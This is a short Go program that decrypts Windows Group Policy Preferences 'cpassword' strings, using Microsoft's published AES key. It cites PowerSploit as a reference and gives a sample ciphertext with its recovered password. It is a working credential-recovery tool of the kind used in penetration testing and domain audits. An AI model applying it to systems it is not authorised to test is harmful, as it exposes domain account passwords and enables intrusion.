/
gppdecrypt.go
72 lines (57 loc) · 1.67 KB
/
gppdecrypt.go
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
/*
Decrypts GPP Passwords.
References:
https://github.com/leonteale/pentestpackage/blob/master/Gpprefdecrypt.py
https://github.com/mattifestation/PowerSploit/blob/master/Exfiltration/Get-GPPPassword.ps1
Chris Campbell (@obscuresec)
Usage:
gppdecrypt.exe j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw
L o c a l * P 4 s s w o r d !
*/
package main
import (
"crypto/aes"
"crypto/cipher"
"encoding/base64"
"encoding/hex"
"fmt"
"log"
"os"
"strings"
)
func main() {
cpassword := os.Args[1]
// 32 byte AES key
// http://msdn.microsoft.com/en-us/library/2c15cbf0-f086-4c74-8b70-1f2fa45dd4be%28v=PROT.13%29#endNote2
key := "4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b"
// hex decode the key
decoded, _ := hex.DecodeString(key)
block, err := aes.NewCipher(decoded)
if err != nil {
log.Fatal(err)
}
// add padding to base64 cpassword if necessary
m := len(cpassword) % 4
if m != 0 {
cpassword += strings.Repeat("=", 4-m)
}
// base64 decode cpassword
decodedpassword, errs := base64.StdEncoding.DecodeString(cpassword)
if errs != nil {
log.Fatal(errs)
}
if len(decodedpassword) < aes.BlockSize {
log.Fatal("Cpassword block size too short...\n")
}
var iv = []byte{00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00}
if (len(decodedpassword) % aes.BlockSize) != 0 {
log.Fatal("Blocksize must be multiple of decoded message length...\n")
}
cbc := cipher.NewCBCDecrypter(block, iv)
cbc.CryptBlocks(decodedpassword, decodedpassword)
// remove the padding at the end of password
length := len(decodedpassword)
unpadding := int(decodedpassword[length-1])
clear := decodedpassword[:(length - unpadding)]
fmt.Printf("%s\n", string(clear))
}